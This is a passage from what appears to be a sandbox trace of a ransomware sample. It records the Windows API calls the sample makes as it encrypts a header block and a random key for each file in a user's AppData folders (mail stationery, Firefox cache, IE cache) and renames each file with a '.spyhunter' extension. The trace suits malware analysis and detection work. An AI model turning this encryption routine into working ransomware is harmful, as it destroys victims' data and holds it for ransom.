lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf174*=0x30, lpOverlapped=0x0) returned 1 [0139.064] CloseHandle (hObject=0xec) returned 1 [0139.064] GetProcessHeap () returned 0x2c0000 [0139.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.064] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.spyhunter") returned 101 [0139.064] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.spyhunter")) returned 1 [0139.065] GetProcessHeap () returned 0x2c0000 [0139.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.065] GetProcessHeap () returned 0x2c0000 [0139.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.065] GetProcessHeap () returned 0x2c0000 [0139.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45c28 | out: hHeap=0x2c0000) returned 1 [0139.065] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1b0 | out: pbBuffer=0x25cf1b0) returned 1 [0139.065] GetProcessHeap () returned 0x2c0000 [0139.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.065] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1a8*=0x30) returned 1 [0139.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.066] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0139.066] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0139.066] GetProcessHeap () returned 0x2c0000 [0139.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.066] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf16c*=0x2800, lpOverlapped=0x0) returned 1 [0139.155] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.155] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf16c*=0x2800, lpOverlapped=0x0) returned 1 [0139.155] GetProcessHeap () returned 0x2c0000 [0139.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.155] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.155] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf16c, lpOverlapped=0x0 | out: lpBuffer=0x25cf1ac*, lpNumberOfBytesWritten=0x25cf16c*=0x4, lpOverlapped=0x0) returned 1 [0139.155] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf16c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf16c*=0x30, lpOverlapped=0x0) returned 1 [0139.155] CloseHandle (hObject=0xec) returned 1 [0139.155] GetProcessHeap () returned 0x2c0000 [0139.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f92e30 [0139.156] wnsprintfW (in: pszDest=0x2f92e30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.spyhunter") returned 104 [0139.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.spyhunter")) returned 1 [0139.156] GetProcessHeap () returned 0x2c0000 [0139.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f92e30 | out: hHeap=0x2c0000) returned 1 [0139.157] GetProcessHeap () returned 0x2c0000 [0139.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.157] GetProcessHeap () returned 0x2c0000 [0139.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfcb8 | out: hHeap=0x2c0000) returned 1 [0139.158] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1a8 | out: pbBuffer=0x25cf1a8) returned 1 [0139.158] GetProcessHeap () returned 0x2c0000 [0139.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.158] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1a0*=0x30) returned 1 [0139.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0139.159] StrStrW (lpFirst="7E0FEd01", lpSrch=".txt") returned 0x0 [0139.159] GetProcessHeap () returned 0x2c0000 [0139.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.159] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf164*=0x2800, lpOverlapped=0x0) returned 1 [0139.165] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.165] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf164*=0x2800, lpOverlapped=0x0) returned 1 [0139.165] GetProcessHeap () returned 0x2c0000 [0139.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.165] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.165] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf164, lpOverlapped=0x0 | out: lpBuffer=0x25cf1a4*, lpNumberOfBytesWritten=0x25cf164*=0x4, lpOverlapped=0x0) returned 1 [0139.166] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf164, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf164*=0x30, lpOverlapped=0x0) returned 1 [0139.166] CloseHandle (hObject=0xec) returned 1 [0139.166] GetProcessHeap () returned 0x2c0000 [0139.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f92e30 [0139.167] wnsprintfW (in: pszDest=0x2f92e30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.spyhunter") returned 119 [0139.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.spyhunter")) returned 1 [0139.167] GetProcessHeap () returned 0x2c0000 [0139.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f92e30 | out: hHeap=0x2c0000) returned 1 [0139.167] GetProcessHeap () returned 0x2c0000 [0139.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.167] GetProcessHeap () returned 0x2c0000 [0139.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd648 | out: hHeap=0x2c0000) returned 1 [0139.169] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1a0 | out: pbBuffer=0x25cf1a0) returned 1 [0139.169] GetProcessHeap () returned 0x2c0000 [0139.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.170] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf198*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf198*=0x30) returned 1 [0139.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0139.170] StrStrW (lpFirst="71469d01", lpSrch=".txt") returned 0x0 [0139.170] GetProcessHeap () returned 0x2c0000 [0139.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.170] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf15c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf15c*=0x2800, lpOverlapped=0x0) returned 1 [0139.361] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.361] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf15c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf15c*=0x2800, lpOverlapped=0x0) returned 1 [0139.361] GetProcessHeap () returned 0x2c0000 [0139.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.361] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.361] WriteFile (in: hFile=0xec, lpBuffer=0x25cf19c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf15c, lpOverlapped=0x0 | out: lpBuffer=0x25cf19c*, lpNumberOfBytesWritten=0x25cf15c*=0x4, lpOverlapped=0x0) returned 1 [0139.378] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf15c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf15c*=0x30, lpOverlapped=0x0) returned 1 [0139.378] CloseHandle (hObject=0xec) returned 1 [0139.386] GetProcessHeap () returned 0x2c0000 [0139.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.386] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.spyhunter") returned 119 [0139.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.spyhunter")) returned 1 [0139.386] GetProcessHeap () returned 0x2c0000 [0139.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.387] GetProcessHeap () returned 0x2c0000 [0139.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.387] GetProcessHeap () returned 0x2c0000 [0139.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd3f8 | out: hHeap=0x2c0000) returned 1 [0139.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf198 | out: pbBuffer=0x25cf198) returned 1 [0139.387] GetProcessHeap () returned 0x2c0000 [0139.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf190*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf190*=0x30) returned 1 [0139.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0139.387] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0139.387] GetProcessHeap () returned 0x2c0000 [0139.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.388] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf154*=0x2800, lpOverlapped=0x0) returned 1 [0139.389] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.389] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf154*=0x2800, lpOverlapped=0x0) returned 1 [0139.389] GetProcessHeap () returned 0x2c0000 [0139.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.389] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.389] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf194*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x25cf194*, lpNumberOfBytesWritten=0x25cf154*=0x4, lpOverlapped=0x0) returned 1 [0139.389] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf154*=0x30, lpOverlapped=0x0) returned 1 [0139.389] CloseHandle (hObject=0xb4) returned 1 [0139.390] GetProcessHeap () returned 0x2c0000 [0139.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.390] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.spyhunter") returned 109 [0139.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.spyhunter")) returned 1 [0139.391] GetProcessHeap () returned 0x2c0000 [0139.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.391] GetProcessHeap () returned 0x2c0000 [0139.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.391] GetProcessHeap () returned 0x2c0000 [0139.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c018 | out: hHeap=0x2c0000) returned 1 [0139.391] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf198 | out: pbBuffer=0x25cf198) returned 1 [0139.391] GetProcessHeap () returned 0x2c0000 [0139.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.391] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf190*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf190*=0x30) returned 1 [0139.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0139.392] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.392] GetProcessHeap () returned 0x2c0000 [0139.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.392] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf154*=0x43, lpOverlapped=0x0) returned 1 [0139.393] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.393] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf154*=0x43, lpOverlapped=0x0) returned 1 [0139.393] GetProcessHeap () returned 0x2c0000 [0139.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.393] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.393] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf194*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x25cf194*, lpNumberOfBytesWritten=0x25cf154*=0x4, lpOverlapped=0x0) returned 1 [0139.393] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf154, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf154*=0x30, lpOverlapped=0x0) returned 1 [0139.394] CloseHandle (hObject=0xb4) returned 1 [0139.394] GetProcessHeap () returned 0x2c0000 [0139.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.394] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.spyhunter") returned 111 [0139.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.spyhunter")) returned 1 [0139.395] GetProcessHeap () returned 0x2c0000 [0139.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.395] GetProcessHeap () returned 0x2c0000 [0139.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.395] GetProcessHeap () returned 0x2c0000 [0139.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bf00 | out: hHeap=0x2c0000) returned 1 [0139.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf190 | out: pbBuffer=0x25cf190) returned 1 [0139.396] GetProcessHeap () returned 0x2c0000 [0139.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf188*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf188*=0x30) returned 1 [0139.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0139.397] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.397] GetProcessHeap () returned 0x2c0000 [0139.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.397] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf14c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf14c*=0x43, lpOverlapped=0x0) returned 1 [0139.398] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.398] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x25cf14c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf14c*=0x43, lpOverlapped=0x0) returned 1 [0139.398] GetProcessHeap () returned 0x2c0000 [0139.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 